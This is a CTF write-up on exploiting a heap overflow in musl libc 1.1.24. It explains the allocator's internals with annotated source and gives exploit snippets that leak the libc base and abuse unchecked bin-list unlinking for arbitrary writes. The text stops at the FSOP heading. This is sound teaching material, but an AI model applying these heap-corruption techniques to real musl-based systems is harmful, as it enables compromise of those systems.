Exploiting a musl libc heap vulnerability: notes from a CTF challenge


 

This article walks through a CTF challenge to show how to exploit a heap overflow vulnerability under musl libc.

0. Preface

The 2020 XCTF college "fight the epidemic" competition ended on March 9th. On behalf of the Xp0int team of Jinan University, I contributed a PWN challenge called musl.

The challenge focuses on heap exploitation under musl libc: mainly how the musl libc heap manager is implemented and how a heap overflow can be exploited there. Compared with the familiar glibc, the musl libc heap manager is very simple, with less than 400 lines of core source code, so as long as you read the source carefully you can work out how to exploit the bug even if you have never looked at musl libc before.

(The challenge was originally named carbon, but for some reason the name was changed to musl...)

Starting from the musl challenge, this article introduces how to exploit heap vulnerabilities under musl libc. It is divided into three parts: the first part covers the mistakes I made when setting the challenge, the second gives an overview of the musl libc heap manager, and the last part analyzes the challenge and builds the exploit.

This is my first write-up here, so any feedback is welcome.

 

1. Mistakes in the challenge

This is actually the first time I have written a challenge for a public CTF; before this I had only written a few simple beginner challenges for my school. I was very careful when designing it and deliberately spent a lot of time hardening it against mistakes and unintended solutions. In the end, the top players still found an unintended solution and broke the challenge...

Looking back, I found two mistakes. The root cause was that the binary was not checked carefully enough and leaked extra information to the players. Let's go through the mistakes and how to fix them.

void init()
{
    setvbuf(stdin,  NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    LIST = mmap(0, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    if( LIST == (struct item*)-1 ) {
        echo("ERROR: Unable to mmapn");
        a_crash();
    }

    alarm(30);
} 

Both mistakes are located in the init function (sub_400B77). Shown above is the source code of init, which initializes the challenge environment.


1.1 Stack address

The biggest mistake was not clearing the stack addresses stored in the libc library's writable data.

The intended solution is to hijack the program's control flow with FSOP, but if a stack address can be leaked, a ROP chain can be written directly onto the stack. Looking at the write-ups published after the game, most players got a shell this way.

pwndbg> leakfind $libc+0x292000 --page_name=stack --max_offset=0x4000 --max_depth=1
0x7ffff7ffb000+0x32f0   0x7fffffffe600 [stack]
0x7ffff7ffb000+0x31f8   0x7fffffffe390 [stack]
0x7ffff7ffb000+0x2fd8   0x7fffffffe4d8 [stack]
0x7ffff7ffb000+0x3000   0x7fffffffe765 [stack]
0x7ffff7ffb000+0x3008   0x7fffffffe770 [stack]
0x7ffff7ffb000+0x2908   0x7fffffffefe6 [stack] 

The fix is simple. First use pwndbg to search the .bss section of the libc library for locations that leak stack addresses.

#define WRITE_GOT 0x601F98
//clear all stack addresses in libc .BSS section
uint64_t* libc_bss = (uint64_t*)(*((uint64_t*)WRITE_GOT) - 0x5a3b5 + 0x292000);
libc_bss[0x2908/8] = 0;
libc_bss[0x2fd8/8] = 0;
libc_bss[0x3000/8] = 0;
libc_bss[0x3008/8] = 0;
libc_bss[0x31f8/8] = 0;
libc_bss[0x32f0/8] = 0;
libc_bss = 0; 

Then clear them one by one in the init function.

1.2 mmap

The other mistake is a misuse of the mmap function, which leaks the address of LIST.

//void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
LIST = mmap(0, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 

The problem is the addr parameter. When addr is 0, mmap finds a vacant region in the program's address space and returns its start address to the caller, but this address is not randomized.

In gdb we can see that LIST lands right next to the libc library, at a fixed offset of 0x28c000 from the libc base address (which can be leaked), so the address of LIST is effectively leaked as well.

The intended solution is to hijack the bin linked list so that malloc returns an arbitrary pointer, which gives an arbitrary address write. But if the LIST address is known, the pointers stored in LIST can simply be overwritten by hijacking LIST directly.

//generate a 40 bit random address
uint64_t addr = 0;
int fd = open("/dev/urandom", O_RDONLY);
if( read(fd, &addr, 5) < 0 )
    a_crash();
close(fd);
addr &= ~0xFFF;

LIST = mmap((void*)addr, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if( LIST != (struct item*)addr ) {
    echo("ERROR: Unable to mmapn");
    a_crash();
}
addr = 0; 

The fix is to generate a random 40-bit address from /dev/urandom and pass it to mmap as the addr parameter. (The program cannot simply enable PIE, because PIE would break the 0xbadbeef bypass used in the intended solution.)

After the fix, LIST sits at a random address.


void init()
{
    setvbuf(stdin,  NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

   //generate a 40 bit random address
    uint64_t addr = 0;
    int fd = open("/dev/urandom", O_RDONLY);
    if( read(fd, &addr, 5) < 0 )
        a_crash();
    close(fd);
    addr &= ~0xFFF;

    LIST = mmap((void*)addr, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
    if( LIST != (struct item*)addr ) {
        echo("ERROR: Unable to mmapn");
        a_crash();
    }
    addr = 0;

    #define WRITE_GOT 0x601F98
   //clear all stack addresses in libc .BSS section
    uint64_t* libc_bss = (uint64_t*)(*((uint64_t*)WRITE_GOT) - 0x5a3b5 + 0x292000);
    libc_bss[0x2908/8] = 0;
    libc_bss[0x2fd8/8] = 0;
    libc_bss[0x3000/8] = 0;
    libc_bss[0x3008/8] = 0;
    libc_bss[0x31f8/8] = 0;
    libc_bss[0x32f0/8] = 0;
    libc_bss = 0;

    alarm(30);
} 

The above is the source code of the repaired init function.

 

2. Overview of the musl libc heap manager

musl libc is a lightweight libc library developed for embedded systems, featuring simplicity, small size and efficiency. Several Linux distributions use it as the default libc in place of the bloated glibc, for example Alpine Linux (familiar from Docker images), OpenWrt (common on routers) and Gentoo.

Due to space constraints, I will only cover the differences between the musl libc heap manager and glibc, a few data structures, the implementation of malloc and free, and static heap memory. The musl libc version used in this article is v1.1.24.

In principle, this memory allocator is roughly equivalent to Doug
Lea's dlmalloc with fine-grained locking.

malloc:

Uses a freelist binned by chunk size, with a bitmap to optimize
searching for the smallest non-empty bin which can satisfy an
allocation. If no free chunks are available, it creates a new chunk of
the requested size and attempts to merge it with any existing free
chunk immediately below the newly created chunk.

Whether the chunk was obtained from a bin or newly created, it's
likely to be larger than the requested allocation. malloc always
finishes its work by passing the new chunk to realloc, which will
split it into two chunks and free the tail portion. 

According to the design notes above, the musl libc heap manager is roughly equivalent to dlmalloc (the predecessor of ptmalloc2, on which the glibc heap manager is based), so parts such as the chunk layout and unbin are very similar to glibc.

The big difference from glibc is the bin design. In musl libc the bins consist of 64 circular doubly linked lists, each structured much like a glibc small bin, plus a 64-bit bitmap that records which lists are non-empty. The lists are maintained FIFO style: chunks are removed from the head of a list and inserted at its tail. Each bin covers a different range of chunk sizes; the smallest bins hold only a single chunk size, while the largest covers up to 1024 different sizes.
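
To make the binmap mechanism concrete, here is a minimal standalone sketch (not musl code, just the same bit trick that malloc uses in the listing further below) of how the smallest usable non-empty bin is found; __builtin_ctzll is a GCC/Clang builtin standing in for musl's first_set:

#include <stdint.h>

/* mirrors "mask = mal.binmap & -(1ULL<<i); j = first_set(mask);" in malloc() */
static int smallest_nonempty_bin(uint64_t binmap, int i)
{
    uint64_t mask = binmap & -(1ULL << i);   /* keep only the bits for bins i..63 */
    if (!mask) return -1;                    /* every candidate bin is empty */
    return __builtin_ctzll(mask);            /* index of the lowest set bit */
}

int main(void)
{
    /* bins 5 and 40 are non-empty: a request that maps to bin 3 is served from bin 5 */
    uint64_t binmap = (1ULL << 5) | (1ULL << 40);
    return smallest_nonempty_bin(binmap, 3) == 5 ? 0 : 1;
}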

musl libc does not implement hook functions such as __malloc_hook and __free_hook, so the heap cannot be used to hijack control flow directly. In addition, on 64-bit systems chunk sizes are aligned to 32 bytes rather than glibc's 16, so the minimum chunk size is 0x20 bytes, followed by 0x40, 0x60, 0x80 and so on.
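
As a quick illustration of the size rounding, here is a small self-contained sketch based on the adjust_size() formula quoted in the malloc listing below (the OVERHEAD and SIZE_ALIGN values assume a 64-bit build):

#include <stdio.h>

#define OVERHEAD   0x10UL            /* chunk header: psize + csize */
#define SIZE_ALIGN 0x20UL            /* 4 * sizeof(size_t) on 64-bit */
#define SIZE_MASK  (-SIZE_ALIGN)

static size_t chunk_size_for(size_t n)
{
    /* same rounding as adjust_size(): requests below 0x10 still become 0x20 */
    return (n + OVERHEAD + SIZE_ALIGN - 1) & SIZE_MASK;
}

int main(void)
{
    size_t reqs[] = { 0x1, 0x10, 0x11, 0x30, 0x50 };
    int count = sizeof reqs / sizeof reqs[0];
    for (int i = 0; i < count; i++)
        printf("malloc(%#zx) -> chunk size %#zx\n", reqs[i], chunk_size_for(reqs[i]));
    /* prints 0x20, 0x20, 0x40, 0x40, 0x60 */
    return 0;
}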

For performance reasons, the musl libc heap manager omits many security checks, in particular any validity check on chunk pointers, which makes musl libc heap vulnerabilities easy to exploit.

The source code of malloc and free lives in src/malloc/malloc.c, and some structures and macro definitions are in src/internal/malloc_impl.h.

2.1 Data structure

struct chunk {
    size_t psize, csize; // correspond to glibc's prev_size and size fields
    struct chunk *next, *prev;
}; 

The chunk header is similar to glibc's, but there are no nextsize pointers, and the psize field is not shared with the neighboring chunk the way glibc's prev_size is.

Both the psize and csize fields carry flag bits (in glibc only the size field does), but there is just one flag, INUSE, in the lowest bit (glibc uses the lowest three bits). If the INUSE flag is set (lowest bit is 1), the chunk is in use; if it is clear (lowest bit is 0), the chunk has either been freed or was allocated with mmap, and the flag in psize is needed to tell which of the two it is.

static struct {
    volatile uint64_t binmap;
    struct bin bins[64];
    volatile int free_lock[2];
} mal; 

The mal structure plays the same role as glibc's arena: it records the state of the heap and has three members, a 64-bit unsigned integer binmap, an array of list headers bins, and a lock free_lock. binmap records which bins are non-empty: if a bit is 1, the corresponding bin's list contains chunks.

struct bin {
    volatile int lock[2];
    struct chunk *head;
    struct chunk *tail;
}; 

The structure of a bin list header is shown above. The head and tail pointers point to the first and last chunks respectively, and the prev pointer of the head chunk and the next pointer of the tail chunk point back to the bin header, forming a circular list. When the list is empty, head and tail are either 0 or point to the list header itself.

bin index i | chunk sizes per bin | chunk size range   | relationship between i and the size range
0-31        | 1                   | 0x20 ~ 0x400       | (i+1) * 0x20
32-35       | 8                   | 0x420 ~ 0x800      | (0x420+(i-32)*0x100) ~ (0x500+(i-32)*0x100)
36-39       | 16                  | 0x820 ~ 0x1000     | (0x820+(i-36)*0x200) ~ (0xa00+(i-36)*0x200)
40-43       | 32                  | 0x1020 ~ 0x2000    | (0x1020+(i-40)*0x400) ~ (0x1400+(i-40)*0x400)
44-47       | 64                  | 0x2020 ~ 0x4000    | (0x2020+(i-44)*0x800) ~ (0x2800+(i-44)*0x800)
48-51       | 128                 | 0x4020 ~ 0x8000    | (0x4020+(i-48)*0x1000) ~ (0x5000+(i-48)*0x1000)
52-55       | 256                 | 0x8020 ~ 0x10000   | (0x8020+(i-52)*0x2000) ~ (0xa000+(i-52)*0x2000)
56-59       | 512                 | 0x10020 ~ 0x20000  | (0x10020+(i-56)*0x4000) ~ (0x14000+(i-56)*0x4000)
60-62       | 1024                | 0x20020 ~ 0x38000  | (0x20020+(i-60)*0x8000) ~ (0x28000+(i-60)*0x8000)
63          | unlimited           | 0x38000 and above  | 0x38000 ~

The table above gives the chunk size range of each bin; it can be deduced from the bin_index_up function in the source code. The first 32 bins behave like fastbins or small bins, each holding chunks of a single size; the last 32 bins behave like large bins, each covering multiple chunk sizes.

For example, bin 34 covers chunk sizes from 0x620 to 0x700, i.e. 0x620, 0x640, 0x660, 0x680, 0x6a0, 0x6c0, 0x6e0 and 0x700, eight sizes in total.
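
Before moving on to malloc, here are the helper macros these structures rely on, as I recall them from src/internal/malloc_impl.h in v1.1.24 (worth double-checking against the exact source). Note BIN_TO_CHUNK in particular: it treats the 0x10 bytes in front of mal.bins[i].head as a pseudo chunk header, so the next/prev pointers of a free chunk can point straight into the mal structure.

//src/internal/malloc_impl.h (reconstructed from memory, v1.1.24)
#define SIZE_ALIGN (4*sizeof(size_t))      /* 0x20 on 64-bit */
#define SIZE_MASK  (-SIZE_ALIGN)
#define OVERHEAD   (2*sizeof(size_t))      /* chunk header: psize + csize = 0x10 */
#define MMAP_THRESHOLD (0x1c00*SIZE_ALIGN) /* 0x38000 on 64-bit */
#define DONTCARE   16
#define RECLAIM    163840

#define CHUNK_SIZE(c)   ((c)->csize & -2)
#define CHUNK_PSIZE(c)  ((c)->psize & -2)
#define PREV_CHUNK(c)   ((struct chunk *)((char *)(c) - CHUNK_PSIZE(c)))
#define NEXT_CHUNK(c)   ((struct chunk *)((char *)(c) + CHUNK_SIZE(c)))
#define MEM_TO_CHUNK(p) (struct chunk *)((char *)(p) - OVERHEAD)
#define CHUNK_TO_MEM(c) (void *)((char *)(c) + OVERHEAD)
#define BIN_TO_CHUNK(i) (MEM_TO_CHUNK(&mal.bins[i].head))

#define C_INUSE ((size_t)1)
#define IS_MMAPPED(c) !((c)->csize & (C_INUSE))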

2.2 malloc implementation

//src/malloc/malloc.c L284-L331
void *malloc(size_t n)
{
    struct chunk *c;
    int i, j;

    // 1. Adjust n: add OVERHEAD (0x10) and align it to 32 bytes
    //*n = (*n + OVERHEAD + SIZE_ALIGN - 1) & SIZE_MASK;
    if (adjust_size(&n) < 0) return 0;

    // If n > MMAP_THRESHOLD (0x38000), allocate an mmap chunk
    if (n > MMAP_THRESHOLD) {
        [...]
        return CHUNK_TO_MEM(c);
    }

    // 2. Compute the bin index i corresponding to n
    i = bin_index_up(n);
    for (;;) {
        // 3. Look up binmap for non-empty bins with index >= i
        uint64_t mask = mal.binmap & -(1ULL<<i);
        // If all usable bins are empty, create a new chunk with expand_heap
        if (!mask) {
            c = expand_heap(n);
            [...]
            break;
        }
        // 4. Select the non-empty bin j closest in size to n
        j = first_set(mask);
        lock_bin(j);
        c = mal.bins[j].head; // c is the chunk at the head of bin j
        // 5. If the pretrim conditions are met, split c with pretrim; otherwise unbin c
        if (c != BIN_TO_CHUNK(j)) {
            if (!pretrim(c, n, i, j)) unbin(c, j);
            unlock_bin(j);
            break;
        }
        unlock_bin(j);
    }

    // 6. Trim c down to n bytes
    /* Now patch up in case we over-allocated */
    trim(c, n);

    return CHUNK_TO_MEM(c);
} 

The implementation of malloc is very simple: select a bin via binmap, then take the chunk at the head of that bin's list. No check is performed on the list or on the chunk header while the chunk is being removed.

Detailed steps of malloc:

  1. Adjust n: add the header length and align it to 32 bytes.
  2. If n > MMAP_THRESHOLD, create a memory region of size n with mmap and return it to the user.
  3. If n <= MMAP_THRESHOLD, compute the bin index i corresponding to n and look up binmap:
    • If all usable bins are empty, extend the heap and create a new chunk.
    • If a usable non-empty bin exists, select the bin j whose size range is closest to n and take the chunk c at the head of its list:
      • If the pretrim conditions are met, split c with pretrim;
      • otherwise remove c from the list with unbin.
    • Finally, the chunk is trimmed with trim and returned to the user.

Next, let's briefly look at unbin, pretrim and trim.

//src/malloc/malloc.c L188-L213
static void unbin(struct chunk *c, int i)
{
    // If c is the only chunk in the bin, mark bin i as empty in binmap
    if (c->prev == c->next)
        a_and_64(&mal.binmap, ~(1ULL<<i));
    // Unlink the chunk from the doubly linked list
    c->prev->next = c->next;
    c->next->prev = c->prev;
    // Set the INUSE flags
    c->csize |= C_INUSE;
    NEXT_CHUNK(c)->psize |= C_INUSE;
} 

unbin is the equivalent of glibc's unlink: it removes a chunk from a bin's doubly linked list. unbin does not check whether the chunk's pointers are legal while doing so.

//src/malloc/malloc.c L233-L264
/* pretrim - trims a chunk _prior_ to removing it from its bin.
 * Must be called with i as the ideal bin for size n, j the bin
 * for the _free_ chunk self, and bin j locked. */
static int pretrim(struct chunk *self, size_t n, int i, int j)
{
    size_t n1;
    struct chunk *next, *split;

    // Condition 1: the index of bin j must be at least 40
    /* We cannot pretrim if it would require re-binning. */
    if (j < 40) return 0;
    // Condition 2: j must be at least i+3, unless j is 63 and
    // the remainder after splitting exceeds MMAP_THRESHOLD
    if (j < i+3) {
        if (j != 63) return 0;
        n1 = CHUNK_SIZE(self);
        if (n1-n <= MMAP_THRESHOLD) return 0;
    } else {
        n1 = CHUNK_SIZE(self);
    }
    // Condition 3: the remainder must still map to bin j, so that split stays in self's bin
    if (bin_index(n1-n) != j) return 0;

    // Split off a chunk of size n from the front of self
    next = NEXT_CHUNK(self);
    split = (void *)((char *)self + n);

    split->prev = self->prev;
    split->next = self->next;
    split->prev->next = split;
    split->next->prev = split;
    split->psize = n | C_INUSE;
    split->csize = n1-n;
    next->psize = n1-n;
    self->csize = n | C_INUSE;
    return 1;
} 

The purpose of pretrim is to split large chunks so that a chunk far bigger than the request is not handed to the user. When the conditions above are met, pretrim cuts a small chunk of exactly the required size off the first chunk of the bin list and returns it to the user, while the remainder keeps the original chunk's position in the list.

//src/malloc/malloc.c L266-L282
static void trim(struct chunk *self, size_t n)
{
    size_t n1 = CHUNK_SIZE(self);
    struct chunk *next, *split;

    // Do nothing if self's size n1 exceeds n by no more than DONTCARE (0x10) bytes
    if (n >= n1 - DONTCARE) return;

    // Split self at offset n, creating the chunk split
    next = NEXT_CHUNK(self);
    split = (void *)((char *)self + n);

    split->psize = n | C_INUSE;
    split->csize = n1-n | C_INUSE;
    next->psize = n1-n | C_INUSE;
    self->csize = n | C_INUSE;

    // Release split into its bin
    __bin_chunk(split);
} 

The last step of malloc is trim, whose job is to reclaim the part of the chunk that exceeds the requested size: it cuts off the excess and releases it back into a bin, reducing memory waste.

2.3 free implementation

//src/malloc/malloc.c L519-L529
void free(void *p)
{
    if (!p) return;

    struct chunk *self = MEM_TO_CHUNK(p);

    // If csize's INUSE flag is not set, the chunk is either an mmap chunk or a double free
    //#define IS_MMAPPED(c) !((c)->csize & (C_INUSE))
    if (IS_MMAPPED(self))
        unmap_chunk(self);
    else
        __bin_chunk(self);
}

//src/malloc/malloc.c L509-L517
static void unmap_chunk(struct chunk *self)
{
    size_t extra = self->psize;
    char *base = (char *)self - extra;
    size_t len = CHUNK_SIZE(self) + extra;
    // If psize's INUSE flag is set, treat it as a double free and crash
    /* Crash on double free */
    if (extra & 1) a_crash();
    __munmap(base, len);
} 

free first checks whether the chunk is an mmap chunk or a double free. If the INUSE flag is not set in the chunk's csize field, it enters unmap_chunk, which inspects psize: if the INUSE flag is set there, the call is treated as a double free and the process crashes; otherwise the chunk is treated as an mmap chunk and released via __munmap.

//src/malloc/malloc.c L440-L507
void __bin_chunk(struct chunk *self)
{
    struct chunk *next = NEXT_CHUNK(self);
    size_t final_size, new_size, size;
    int reclaim=0;
    int i;

    // new_size is self's current size; final_size is the total size after merging adjacent free chunks
    final_size = new_size = CHUNK_SIZE(self);

    // Crash if the next chunk's psize does not match self's csize
    /* Crash on corrupted footer (likely from buffer overflow) */
    if (next->psize != self->csize) a_crash();

    // 1. Merge self with adjacent free chunks
    for (;;) {
        if (self->psize & next->csize & C_INUSE) {
            // Tentatively set the sizes, INUSE flags still set (cleared after the loop)
            self->csize = final_size | C_INUSE;
            next->psize = final_size | C_INUSE;
            // Compute the bin index i for final_size
            i = bin_index(final_size);
            lock_bin(i);
            lock(mal.free_lock);
            if (self->psize & next->csize & C_INUSE)
                break; // both neighbors are in use, merging is finished
            unlock(mal.free_lock);
            unlock_bin(i);
        }

        // Merge with the previous chunk if it is free
        if (alloc_rev(self)) { // alloc_rev removes the previous free chunk from its bin
            self = PREV_CHUNK(self);
            size = CHUNK_SIZE(self);
            final_size += size;
            if (new_size+size > RECLAIM && (new_size+size^size) > size)
                reclaim = 1;
        }

        // Merge with the next chunk if it is free
        if (alloc_fwd(next)) { // alloc_fwd removes the next free chunk from its bin
            size = CHUNK_SIZE(next);
            final_size += size;
            if (new_size+size > RECLAIM && (new_size+size^size) > size)
                reclaim = 1;
            next = NEXT_CHUNK(next);
        }
    }

    // 2. Mark bin i as non-empty in binmap
    if (!(mal.binmap & 1ULL<<i))
        a_or_64(&mal.binmap, 1ULL<<i);

    self->csize = final_size;
    next->psize = final_size;
    unlock(mal.free_lock);

    // 3. Insert self at the tail of bin i
    self->next = BIN_TO_CHUNK(i);
    self->prev = mal.bins[i].tail;
    self->next->prev = self;
    self->prev->next = self;

    /* Replace middle of large chunks with fresh zero pages */
    if (reclaim) {
        [...]
    }

    unlock_bin(i);
} 

__bin_chunk inserts a chunk into a bin list: it first merges the chunk with any free chunks before and after it, then sets binmap and the chunk flags, and finally inserts the chunk into the corresponding bin list.

2.4 Static heap memory

In glibc, the heap normally lives in a dynamic memory area. To reduce memory overhead, the musl libc heap manager also turns the unused (static) memory of the program and the libc library into heap memory, and prefers this static heap memory when allocating chunks. Only when the static heap memory is exhausted or cannot satisfy a request does musl libc ask for dynamic memory.

Next, let's look at how musl libc implements this feature.

void __dls3(size_t *sp)
{
    [...]
   //ldso/dynlink.c L1839-L1840
   /* Donate unused parts of app and library mapping to malloc */
    reclaim_gaps(&app);
    reclaim_gaps(&ldso);
    [...]
} 

During initialization, musl libc calls the reclaim_gaps function to find and release the unused memory of the program and of the libc library.

//ldso/dynlink.c L526-L552
/* A huge hack: to make up for the wastefulness of shared libraries
 * needing at least a page of dirty memory even if they have no global
 * data, we reclaim the gaps at the beginning and end of writable maps
 * and "donate" them to the heap. */

static void reclaim(struct dso *dso, size_t start, size_t end)
{
    // Skip the RELRO region
    if (start >= dso->relro_start && start < dso->relro_end) start = dso->relro_end;
    if (end   >= dso->relro_start && end   < dso->relro_end) end = dso->relro_start;
    if (start >= end) return;
    char *base = laddr_pg(dso, start);
    // __malloc_donate releases the memory block into a bin
    __malloc_donate(base, base+(end-start));
}

static void reclaim_gaps(struct dso *dso)
{
    Phdr *ph = dso->phdr;
    size_t phcnt = dso->phnum;

    // Iterate over all program headers
    for (; phcnt--; ph=(void *)((char *)ph+dso->phentsize)) {
        // Condition 1: PT_LOAD segment
        if (ph->p_type!=PT_LOAD) continue;
        // Condition 2: readable and writable
        if ((ph->p_flags&(PF_R|PF_W))!=(PF_R|PF_W)) continue;
        // Pass the gaps between the segment boundaries and the enclosing page boundaries to reclaim
        reclaim(dso, ph->p_vaddr & -PAGE_SIZE, ph->p_vaddr);
        reclaim(dso, ph->p_vaddr+ph->p_memsz,
            ph->p_vaddr+ph->p_memsz+PAGE_SIZE-1 & -PAGE_SIZE);
    }
} 

reclaim_gaps iterates over the loadable segments of a DSO. For each qualifying segment it computes the two gaps between the segment's boundaries and the page boundaries that enclose it, and passes them to reclaim, which finally releases them into the bins through __malloc_donate.

After musl libc finishes initializing, gdb shows two chunks already sitting in the bins, located inside the libc library and the program respectively. malloc can carve them up with trim or pretrim to produce multiple chunks for the user.

This feature helps with information leaks during exploitation: knowing the address of such a chunk is equivalent to knowing the libc or program base address, and conversely, once the libc or program base address is leaked, the address of any of these chunks can be computed.

 

3. Challenge analysis

Challenge source code: github.com/xf1les/XCTF...

Run build.sh in the source directory to build the libc library and the carbon binary with debugging information.

root@4124cf40a89b:/pwn/Debug# ./libc.so
musl libc (x86_64)
Version 1.1.24
Dynamic Program Loader
Usage: ./libc.so [options] [--] pathname [args]
root@4124cf40a89b:/pwn/Debug# checksec carbon
[*] '/pwn/Debug/carbon'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000) 

The binary enables every protection except PIE, and the musl libc version is 1.1.24.

1) Assign sleeves
2) Destory sleeves
3) Transform sleeves
4) Examine sleeves
5) Real death
> 

A typical menu challenge: you can add, delete, edit and view heap chunks. A few points deserve attention:

  • add allows a one-time heap overflow of up to 0x50 bytes.
  • exit is called in only one place: when the pointer returned by malloc equals 0xbadbeef.
  • view can only be used once.

 

4. Vulnerability Exploitation

Exploitation has three main steps: first, leak the libc base address; second, overwrite the pointer fields of the chunk at the head of a bin list via the heap overflow and use unbin to obtain an arbitrary address write; third, lay out the FSOP payload, corrupt the heap manager's internal variables, trigger FSOP through the exit call and get a shell.

4.1 Leaking libc base address

Request a chunk smaller than 0x400 bytes: its first 8 bytes still hold the address of the bin list header left behind by unbin. Reading it with the one-shot view leaks the libc base address.

add(0x1, 'A') #0
libc_base = u64(view(0).ljust(8, '\x00')) - 0x292e41 # bin[0] 

When the chunk size is 0x20 bytes, the residual pointer points to the mal.bins[0] list header at mal+832, whose offset from the libc base address is 0x292e00.
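
A small sketch of the leak arithmetic (the base address below is made up for illustration): the 'A' we sent overwrites the low byte of the residual pointer, and subtracting 0x292e41 strips both the 'A' and the page offset, leaving the libc base:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
    uint64_t libc_base = 0x155554000000ULL;           /* hypothetical example base */
    uint64_t residual  = libc_base + 0x292e00;        /* leftover bin-header pointer */
    uint64_t leaked    = (residual & ~0xffULL) | 'A'; /* low byte clobbered by our 'A' */
    printf("%#llx\n", (unsigned long long)(leaked - 0x292e41)); /* == libc_base */
    return 0;
}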

4.2 Use unbin to achieve arbitrary address writing

unbin does not check whether the prev and next pointers are legal. With the heap overflow we can rewrite these two pointers and let unbin write pointer values to addresses of our choosing, namely ((uint64_t*)prev)[2] = next and ((uint64_t*)next)[3] = prev (writes at prev+0x10 and next+0x18).
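
Here is a minimal standalone sketch (plain C, not the challenge code) of this write primitive, with two local arrays standing in for the two write targets:

#include <stdint.h>
#include <stdio.h>

struct chunk {
    size_t psize, csize;
    struct chunk *next, *prev;
};

int main(void)
{
    uint64_t bin_head[4]   = {0};   /* stand-in for the bin header we want to corrupt */
    uint64_t fake_chunk[4] = {0};   /* stand-in for the fake chunk */

    struct chunk victim = {0};
    /* fields a heap overflow would set: next = bin - 0x10, prev = fake_chunk */
    victim.next = (struct chunk *)((char *)bin_head - 0x10);
    victim.prev = (struct chunk *)fake_chunk;

    /* the two unchecked stores unbin() performs */
    victim.prev->next = victim.next;   /* write at fake_chunk + 0x10 */
    victim.next->prev = victim.prev;   /* write at (bin - 0x10) + 0x18, i.e. bin + 8 */

    printf("fake_chunk[2] = %p\n", (void *)(uintptr_t)fake_chunk[2]);
    printf("bin_head[1]   = %p\n", (void *)(uintptr_t)bin_head[1]);
    return 0;
}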

As can be observed in gdb, mal.bins[38] is a non-empty bin. We can build a fake chunk near the memory we want to control, use unbin to write the fake chunk address into the mal.bins[38]->head pointer, and then have malloc return the fake chunk by hijacking the bin list, achieving an arbitrary address write.

4.2.1 Hijacking the bin list

add(0x10, 'A'*0x10) #1
add(0x10, 'B'*0x10) #2, prevent consolidation
add(0x10, 'C'*0x10) #3
add(0x10, 'D'*0x10) #4, prevent consolidation

free(1)
free(3) 

First allocate four chunks of 0x20 bytes, then free chunk 1 and chunk 3. The freed chunks go into the mal.bins[0] list, with the mal.bins[0]->head pointer pointing at chunk 1.

bin = libc_base + 0x292e40 # mal.bins[38]->head

next = bin - 0x10
prev = fake_chunk

payload  = 'X' * 0x10
payload += p64(0x21) * 2 + 'X' * 0x10
payload += p64(0x21) + p64(0x20) + p64(next) + p64(prev)
payload += p8(0x20)
payload += '\n'

add(0x10, payload, 'Y') #1, heap overflow 

Now allocate another 0x20-byte chunk: malloc takes chunk 1, which mal.bins[0]->head points to, out of the list and updates head to point at chunk 3. The write into chunk 1 overflows into chunk 3, rewriting its prev pointer to the fake chunk address and its next pointer so that it targets the mal.bins[38]->head pointer.

add(0x10) # 3, unbin #1 

Allocating a 0x20-byte chunk once more makes malloc unbin chunk 3, which writes the fake chunk address into the mal.bins[38]->head pointer.

add(0x50) # 5, fake chunk 

Finally, allocate a 0x60-byte chunk: malloc takes the fake chunk out of mal.bins[38] and returns its address.

edit(3, p64(next) + p64(prev2))
add(0x10) # 3, unbin #2
add(0x50) # 5, fake_chunk #2

edit(3, p64(next) + p64(prev3))
add(0x10) # 3, unbin #3
add(0x50) # 6, fake_chunk #3

edit(3, p64(next) + p64(prev4))
add(0x10) # 3, unbin #4
add(0x50) # 7, fake_chunk #4

edit(3, p64(next) + p64(prev5))
add(0x10) # 3, unbin #5
add(0x50) # 8, fake_chunk #5

[......] 

Because the mal.bins[0] list has been corrupted, the mal.bins[0]->head pointer is no longer updated and keeps pointing at chunk 3. By repeatedly rewriting chunk 3's prev pointer we can perform multiple arbitrary address writes.

4.2.2 Construct fake chunk

Since malloc does not check the chunk header, a fake chunk can be taken off a bin list by unbin as long as its prev and next pointers hold legal addresses, i.e. the values at ((uint64_t*)fake_chunk)[2] and ((uint64_t*)fake_chunk)[3] must both be writable memory addresses.

In addition to using existing fake chunks, we can also use unbin to construct fake chunks on any memory block:

fake_chunk = target - 0x10

edit(3, p64(fake_chunk) + p64(fake_chunk))
add(0x10) # 3, unbin 

Assume the address of the memory block we want to control is target. Set both the prev and next pointers of chunk 3 to target - 0x10 (the fake chunk address), then trigger unbin.

Before unbin.

After unbin, the prev and next pointers of the fake chunk have been overwritten with the fake chunk address, which satisfies the construction requirement.

free(n) # chunk n is an in-use chunk of 0x20 bytes 

Then release a chunk of 0x20 bytes.

//src/malloc/malloc.c L188-L191
static void unbin(struct chunk *c, int i)
{
    if (c->prev == c->next)
        a_and_64(&mal.binmap, ~(1ULL<<i));

[...]
} 
void __bin_chunk(struct chunk *self)
{

[...]
   //src/malloc/malloc.c L482-L483
    if (!(mal.binmap & 1ULL<<i))
        a_or_64(&mal.binmap, 1ULL<<i);

[...]
} 

This is necessary because when the prev and next pointers are equal, unbin marks mal.bins[0] as an empty bin in binmap, making mal.bins[0] unusable. Freeing any 0x20-byte chunk marks mal.bins[0] as non-empty again.

Note that there can be no free chunks before and after the chunk to be released, otherwise free will merge it, causing the chunk to be released to other bins.

edit(3, p64(bin - 0x10) + p64(fake_chunk))
add(0x10) # 3, unbin
add(0x50) # n+1, target 

Finally, use unbin to write the fake_chunk address into the mal.bins[38]->head pointer; the next allocation then returns target, which is now under our control.

4.3 FSOP

